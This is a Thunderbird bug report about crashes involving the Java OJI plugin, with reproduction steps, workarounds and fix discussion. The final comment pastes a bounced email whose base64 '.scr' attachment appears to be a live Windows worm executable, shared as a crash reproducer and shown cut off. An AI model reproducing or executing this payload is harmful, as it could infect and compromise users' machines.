Closed Bug 223600 Opened 16 years ago Closed 15 years ago

crash (internal error with JVM manager) opening messages with certain viewable attachments when Java plugin enabled

Categories

(Thunderbird :: Mail Window Front End, defect, critical)

x86
Linux
defect
Not set
critical

Tracking

(Not tracked)

VERIFIED FIXED
Thunderbird0.9

People

(Reporter: myk, Assigned: mscott)

References

Details

(Keywords: crash, fixed-aviary1.0)

Attachments

(6 files, 2 obsolete files)

Thunderbird 0.3 (20031014) on my Red Hat Linux 9.0 laptop crashes with the
following error when I attempt to read certain messages with a viewable (f.e.
HTML, text) attachment and the Java OJI plugin is installed in my
~/.mozilla/plugins/ folder:

INTERNAL ERROR on Browser End: Could not get the JVM manager
System error?:: Success

Steps to Reproduce:

1. Install Java OJI plugin into ~/.mozilla/plugins folder (ln -s
/usr/java/j2re1.4.2_01/plugin/i386/ns610-gcc32/libjavaplugin_oji.so
~/.mozilla/plugins/libjavaplugin_oji.so).
2. Run Thunderbird.
3. Click header of message containing viewable attachment.

Expected Results: message gets displayed
Actual Results: Thunderbird crashes

Builds tested on: Thunderbird 0.3 (20031014) for Linux

Additional Information:

I haven't been able to find a pattern to the messages with which Thunderbird
crashes.  One message is a simple text/plain message with a one line message and
a short text/plain attachment containing an SSH key.  Another message contains a
brief text/plain body and an HTML attachment (which doesn't appear to contain
any applets or object tags, although it does contain numerous references to Java).

Also, Thunderbird doesn't crash on every message with viewable attachments. 
When testing for this bug I found that the virus spams which are supposedly from
Microsoft don't crash Thunderbird even when they contain viewable attachments.
Confirmed Linux/x86 20031114. I can reliably (100%) reproduce, with a particular
email. The error is:

INTERNAL ERROR on Browser End: Could not get the JVM manager
System error?:: Success

The mail that causes it to happen has a MIME attachment:

MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----------716A2B1C01688342"

------------716A2B1C01688342
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

   misleading text goes here...

------------716A2B1C01688342
Content-Type: application/octet-stream; name="paypal.asp.scr"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="paypal.asp.scr"

   some virus goes here...

------------716A2B1C01688342--

[are those trailing hyphens relevant?]

I am using the Java plugin from Sun's J2SDK, 1.4.2_02-b03. Removing the plugin
cures the problem.

I can upload the mail if required.
Severity: normal → critical
Flags: blocking0.4?
Summary: crash opening messages with certain viewable attachments when Java plugin enabled in Mozilla → crash (internal error with JVM manager) opening messages with certain viewable attachments when Java plugin enabled
Dup of bug 161291, closed as dup of 141826
It's probably related, e.g. mis-handling underlying errors in the plugin, but I
doubt it's exactly the same, since this bug is Thunderbird only - doesn't crash
mozilla mailnews - at least in my case, and the error message is different.
I get the crash when trying to send an attachment

Mozilla Thunderbird 0.4a (20031112)

Java(TM) Plug-in 1.4.2_02-b03

    File name: libjavaplugin_oji.so
    Java(TM) Plug-in 1.4.2_02


INTERNAL ERROR on Browser End: Could not get the JVM manager
System error?:: Success
And when I receive a mail with an attachment and open the attachment :

 The program 'Gecko' received an X Window System error.
This probably reflects a bug in the program.
The error was 'BadValue (integer parameter out of range for operation)'.
  (Details: serial 14113 error_code 2 request_code 12 minor_code 0)
  (Note to programmers: normally, X errors are reported asynchronously;
   that is, you will receive the error a while after causing it.
   To debug your program, run it with the --sync command line
   option to change this behavior. You can then get a meaningful
   backtrace from your debugger if you break on the gdk_x_error() function.)


Mozilla Thunderbird 0.4a (20031127)
RedHat Linux 9.0

I get the crash when opening the following email (dump from mutt):

==========================================

X-UIDL: 18100000.eml
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Date: Wed, 03 Dec 2003 17:59:56 +0000
From: [email-removed]
Subject: Fwd: The Matrix? - no, the Mootrix!
X-Sender: [email-removed]
To: dereck@box43.pl
X-Mailer: QUALCOMM Windows Eudora Version 5.1
X-OriginalArrivalTime: 03 Dec 2003 18:13:20.0012 (UTC) FILETIME=[219EB4C0:01C3B9C9]
                                                                               
                                                                               
          
[-- Attachment #1 [details] [diff] --]
[-- Type: text/plain, Encoding: 7bit, Size: 0K --]
                                                                               
                                                                               
          
                                                                               
                                                                               
          
[-- Attachment #2 [details] [diff]: The Mootrix_1.asf --]
[-- Type: application/octet-stream, Encoding: base64, Size: 3.7M --]
                                                                               
                                                                               
          
[-- application/octet-stream is unsupported (use 'v' to view this part) --]

==========================================

The attachment is just an asf video file. What has Java to do with it?

Error message in the console:


INTERNAL ERROR on Browser End: Could not get the JVM manager
System error?:: Success
Seems that it is related (or dup of) to bug 221695 and bug 224291.
I cure the bug by removing the Java plugin (Sun's J2SDK 1.4.2_02-b03) from my
.mozilla/plugins directory.




I believe that the bug occurs whith messages in HTML formats.
I wonder if TB loads plugins of FireBird or Mozilla in order to interpret HTML
messages
I'm seeing the same problem with thunderbird 0.4 on Sparc Solaris when I mark
messages as junk or not junk. My java version is 1.4.2_02.
*** Bug 224291 has been marked as a duplicate of this bug. ***
*** Bug 221695 has been marked as a duplicate of this bug. ***
I get this same crash too.  With 0.4RC1 and 0.4 final, on a RH8 system, with the
java 1.4.2 plugin.

Is there some way to disable thunderbird from scanning the mozilla plugins
directory for plugins (or disable plugins entirely?).  Removing the java plugin
entirely  isn't what I want to do, because then mozilla won't see it either..

It seems to crash on 1-2% of mail messages..
0.4 has already been released
Flags: blocking0.4?
Trying to view this message crashes thunderbird 0.4 every time.
another attachment which crashes thunderbird 0.4
I'm using the build from Alan DuBoff:

excerpts from readme:

This build was produced on Sun Solaris 8 x86 02/02 platform and
is compatible with newer releases of Solaris (e.g., Solaris 9).
This build was made from the THUNDERBIRD_0_4_BUILD tag in the CVS
repository (http://www.mozilla.org/cvs.html).

BuildID: 20031109

uname -a information:

SunOS espresso 5.10 s10_49 i86pc i386 i86pc


I've also had this crash on Solaris9/sparc with the same release.


The following email (excerpted below) crashes thunderbird 0.4:

----------------------------------------------
To: XEmacs Beta 
Subject: Hideshow
From: Jerry James 
X-Face: +5(Pfr,;N<RBl'|Xv5zrC\p$;u*nfOiN-E:PeZJda+Y!RC[QkTvF*GR',H5EV,-b;n*%1Hb
 {ZR|hIzas}[;QCvbj=M*ht_-Yp72~mNX0ZVO\$t-6X:mauuY-YrLYDZ$,SnTL^ni{aFj;i1FgDEo,'
 p;B!2B!_F=,`R%TDZxPy@+{&qNKT:9-xg(Z**>>q#6NT,Qi5^TQh-MaUnz#kGN~OW[CQj~RS+sIor(
 '_8K^f9u^Y#.N`>9oKN$\JpI
Date: Wed, 28 Jan 2004 11:49:53 -0600
User-Agent: Gnus/5.1002 (Gnus v5.10.2) XEmacs/21.5 (celeriac, linux)
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="=-=-="
X-VirusScan: Clean
X-XEmacs-List: beta
X-Spam-Checker-Version: SpamAssassin 2.60 (1.212-2003-09-23-exp) on 
        gwyn.tux.org
X-Spam-Status: No, hits=0.0 required=5.0 tests=AWL autolearn=no version=2.60


--=-=-=

A package I want to port to XEmacs uses features of hideshow.el that
have been added since the ancient version we now ship.  I took a look at
the latest version.  With a few minor modifications, I got it working
pretty well.  I think.  Would a few of you mind trying it out?  I'll
attach it to this message.
...


--=-=-=
Content-Type: application/emacs-lisp
Content-Disposition: attachment; filename=hideshow.el
Content-Transfer-Encoding: 8bit
Content-Description: New hideshow.el
----------------------------------------------

note that the boundary="=-=-=" but Jerry's mailreader has actually
inserted "--=-=-=". 

Checking the two attachments I uploaded to this bug, _both_ of them have a
mime content type separator specified which is not adhered to by way of 
adding an extra "--" at the start of the mime content section.



bugzilla should really have the priority set (to P2).



I have an idea on a fix for this. I need someone that sees this who builds
thunderbird on their own on Linux. Time is of the essence if we hope to get this
in for 0.5 by this weekend.

The fix might be as easy as modifying the .mozconfig used to make the build to
include:

ac_add_options --disable-oji

I wish I thought of this sooner but I totally forgot about this bug. 

This would be a wonderful fix to get in by 0.5
Status: NEW → ASSIGNED
Target Milestone: --- → Thunderbird0.5
bleh..silly me...

--disable-oji is already present in the suggested .mozconfig which is why of
course we can't find the JVM manager.

We need to figure out why the app is aborting when that happens instead of
continuing on like it should since we aren't building without OJI.
Here's a possible solution. 

Can someone who sees this remove the following two files from the install?

; plugins
; Optional - only if you need plugin support
components/libgkplugin.so
components/plugin.xpt

Does that make the crash go away?
I filed spin off Bug #233323 to keep track of the fact that mozilla crashes on
Linux if you build with OJI disabled and you then try to load a java plugin.

We just need to find a work around for 0.5
Attached patch possible BRANCH only fix (obsolete) — Splinter Review
Here's a possible fix for the branch only. Don't build modules\plugins if this
is a thunderbird build.
this patch would be the equivalent of deleting 

components/libgkplugin.so
components/plugin.xpt

from an existing linux release installation.

If someone can verify that that does indeed fix the problem, I'll respin 0.5 for
this.
I just checked this into the M4 branch in the hopes that not building the
plugins directory will temporarily work around this problem. Would still like
confirmation on that.
(In reply to comment #24)

Scott, I deleted the files in question from my current installation and am happy
to report that Thunderbird didn't crash this time.

What do we sacrifice by deleting these two files? I believe they aren't there
just for the sake of being distributed ;-)
we don't sacrifice anything. The windows build explicitly leaves those files out
when it gets packaged.

Thanks a lot for testing this for me!
Target Milestone: Thunderbird0.5 → Thunderbird0.6
I believe this was fixed without this patch when Alexander Sack and I landed the
linux packaging code for 0.6. Distros generated from dist\thunderbird should work
Status: ASSIGNED → RESOLVED
Closed: 16 years ago
Resolution: --- → FIXED
I found I had the same problem but I noticed after I upgraded from Thunderbird  
0.5 to 0.6.  Seems that the a directory was changed from:  
  
/usr/X11R6/lib/thunderbird/lib/mozilla-1.6b  
  
to  
  
/usr/X11R6/lib/thunderbird/lib/thunderbird-0.6/  
  
This directory includes the "components" directory which is what thunderbird  
was trying to get to.  By doing...  
  
   cd /usr/X11R6/lib/thunderbird/lib/  
   ln -s thunderbird-0.6 mozilla-1.6b  
  
All was well.  
  
Tim  
*** Bug 230488 has been marked as a duplicate of this bug. ***
*** Bug 244505 has been marked as a duplicate of this bug. ***
Keywords: crash
It just happened to me, with TB 0.8, installed from an official biuld:
thunderbird-0.8-i686-linux-gtk2+xft.tar.gz

INTERNAL ERROR on Browser End: Could not get the JVM manager
System error?:: Success
[1]+  Exit 255                /opt/thunderbird/thunderbird

I'm running Fedora Core 1:
[marek@localhost marek]$ uname -a
Linux localhost 2.4.22-1.2188.nptl #1 Wed Apr 21 20:36:05 EDT 2004 i686 i686
i386 GNU/Linux

[marek@localhost marek]$ /opt/thunderbird/thunderbird -v
(null) Thunderbird 0.8, Copyright (c) 2004 mozilla.org

Java j2re1.4.2_05

It was a very short e-mail message with 2 text files attached. It crashes TB
every time I click on the header. I send/receive such messages all the time...
There are no such files in my thuderbird, firefox or any profile directory...
(tb 0.8, ff1.0pr) :(

(In reply to comment #24)
> this patch would be the equivalent of deleting 
> 
> components/libgkplugin.so
> components/plugin.xpt
> 
> from an existing linux release installation.
> 
> If someone can verify that that does indeed fix the problem, I'll respin 0.5 for
> this.

Removing the java plugin solved it:
[marek@localhost marek]$ cd ~/.mozilla/plugins
[marek@localhost plugins]$ ls
flashplayer.xpt  libflashplayer.so  libjavaplugin_oji.so
[marek@localhost plugins]$ mv libjavaplugin_oji.so ../
[marek@localhost plugins]$ ls
flashplayer.xpt  libflashplayer.so

The question is: why does the TB need the Java plugin???

(In reply to comment #33)
> It just happened to me, with TB 0.8, installed from an official biuld:
> thunderbird-0.8-i686-linux-gtk2+xft.tar.gz
> 
> INTERNAL ERROR on Browser End: Could not get the JVM manager
> System error?:: Success
> [1]+  Exit 255                /opt/thunderbird/thunderbird
> 
> I'm running Fedora Core 1:
> [marek@localhost marek]$ uname -a
> Linux localhost 2.4.22-1.2188.nptl #1 Wed Apr 21 20:36:05 EDT 2004 i686 i686
> i386 GNU/Linux
> 
> [marek@localhost marek]$ /opt/thunderbird/thunderbird -v
> (null) Thunderbird 0.8, Copyright (c) 2004 mozilla.org
> 
> Java j2re1.4.2_05
> 
> It was a very short e-mail message with 2 text files attached. It crashes TB
> every time I click on the header. I send/receive such messages all the time...
> 

I get the same error message and crash as reported above, when composing a new
message, or replying to one. Have latest official build
thunderbird-0.8-i686-linux-gtk2+xft.tar.gz, running Slackware current with
kernel 2.4.26.

(In reply to comment #35)
> Removing the java plugin solved it:
> [marek@localhost marek]$ cd ~/.mozilla/plugins
> [marek@localhost plugins]$ ls
> flashplayer.xpt  libflashplayer.so  libjavaplugin_oji.so
> [marek@localhost plugins]$ mv libjavaplugin_oji.so ../
> [marek@localhost plugins]$ ls
> flashplayer.xpt  libflashplayer.so
> 
> The question is: why does the TB need the Java plugin???
> 
> (In reply to comment #33)
> > It just happened to me, with TB 0.8, installed from an official biuld:
> > thunderbird-0.8-i686-linux-gtk2+xft.tar.gz
> > 
> > INTERNAL ERROR on Browser End: Could not get the JVM manager
> > System error?:: Success
> > [1]+  Exit 255                /opt/thunderbird/thunderbird
> > 
> > I'm running Fedora Core 1:
> > [marek@localhost marek]$ uname -a
> > Linux localhost 2.4.22-1.2188.nptl #1 Wed Apr 21 20:36:05 EDT 2004 i686 i686
> > i386 GNU/Linux
> > 
> > [marek@localhost marek]$ /opt/thunderbird/thunderbird -v
> > (null) Thunderbird 0.8, Copyright (c) 2004 mozilla.org
> > 
> > Java j2re1.4.2_05
> > 
> > It was a very short e-mail message with 2 text files attached. It crashes TB
> > every time I click on the header. I send/receive such messages all the time...
> > 
> 
> 
I don't understand why this bug was marked resolved and fixed.  What was the
fix?  Removing the Java plugin?  That seems hardly a fix to me.  I'm seeing this
problem now on thunderbird 0.8!
Weird thing is that it doesn't happen (to me) when I run Thunderbird 0.8 as root.
I agree that removing the Java plugin from ~/.mozilla is hardly a fix.
This bug reappeared for me in TB 0.8, built from the source tarball on debian
linux woody.

Deleting components/libgkplugin.so and components/plugin.xpt as suggested in
comment #24 solves the problem.
components/libgkplugin.so and components/plugin.xpt don't exist on my install...
They do however exist in my Debian installation, but there I have no problem
with Thunderbird.
*** Bug 262512 has been marked as a duplicate of this bug. ***
Problem appears with official TB 0.8 release, too.

Message source for which it definitely occurs:

Return-Path: <>
X-Flags: 0000
Delivered-To: GMX delivery to kalium@gmx.de
Received: (qmail 2497 invoked by uid 65534); 2 Oct 2004 02:53:20 -0000
Received: from mailserver.unyts.org (EHLO mailserver.unyts.org) (24.75.49.147)
  by mx0.gmx.net (mx028) with SMTP; 02 Oct 2004 04:53:20 +0200
From: postmaster@unyts.org
To: kalium@gmx.de
Date: Fri, 1 Oct 2004 22:53:15 -0400
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
	boundary="9B095B5ADSN=_01C486C879290560000165EEmailserver.unyts"
X-DSNContext: 335a7efd - 4458 - 00000001 - 80040546
Message-ID: <id5pMDVj4000017d0@mailserver.unyts.org>
Subject: Delivery Status Notification (Failure)
X-GMX-Antivirus: -1 (not scanned, may not use virus scanner)
X-GMX-Antispam: 0 (Mail was not recognized as spam)

This is a MIME-formatted message.  
Portions of this message may be unreadable without a MIME-capable mail program.

--9B095B5ADSN=_01C486C879290560000165EEmailserver.unyts
Content-Type: text/plain; charset=

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       kguy@unyts.org




--9B095B5ADSN=_01C486C879290560000165EEmailserver.unyts
Content-Type: message/delivery-status

Reporting-MTA: dns;mailserver.unyts.org
Received-From-MTA: dns;unyts.org
Arrival-Date: Fri, 1 Oct 2004 22:53:11 -0400

Final-Recipient: rfc822;kguy@unyts.org
Action: failed
Status: 5.1.1

--9B095B5ADSN=_01C486C879290560000165EEmailserver.unyts
Content-Type: message/rfc822

Received: from unyts.org ([141.149.244.206]) by mailserver.unyts.org with
Microsoft SMTPSVC(5.0.2195.6713);
	 Fri, 1 Oct 2004 22:53:11 -0400
From: kalium@gmx.de
To: kguy@unyts.org
Subject: this file is bad!
Date: Fri, 1 Oct 2004 22:53:08 -0400
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0014_000013B5.0000750A"
X-Priority: 3
X-MSMail-Priority: Normal
Return-Path: kalium@gmx.de
Message-ID: <MAILSERVERDvZxsDBZn000038f2@mailserver.unyts.org>
X-OriginalArrivalTime: 02 Oct 2004 02:53:11.0509 (UTC) FILETIME=[F45DB050:01C4A82A]

This is a multi-part message in MIME format.

------=_NextPart_000_0014_000013B5.0000750A
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit

are you a teacherin the picture?

------=_NextPart_000_0014_000013B5.0000750A
Content-Type: application/octet-stream;
	name="injection_document.scr"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="injection_document.scr"

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAuAAAAGsiX1YvQzEFL0MxBS9DMQWsXz8FI0MxBcdcOwU0QzEFL0MwBXBDMQWsS2wF
IkMxBcdcOgUqQzEFl0U3BS5DMQVSaWNoL0MxBQAAAAAAAAAAQ29tcHJlc3NlZCBieSBQZXRp
dGUgKGMpMTk5OSBJYW4gTHVjay4AAFBFAABMAQMA7Kc7QAAAAAAAAAAA4AAPAQsBBgAAUAAA
ABwBAAAAAABCoAEAABAAAABgAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAALABAAAE
AAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA/KEBAK8BAAAAkAEA
CAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAgAEAABAAAABWAAAACAAAAAAAAAAAAAAAAAAAYAAA4C5wZXRpdGUAABAAAACQ
AQAIBQAAAF4AAAAAAAAAAAAAAAAAAEAAAEAAAAAAAAAAAKsDAAAAoAEAAAQAAAAEAAAAAAAA
AAAAAAAAAABgAADiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
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
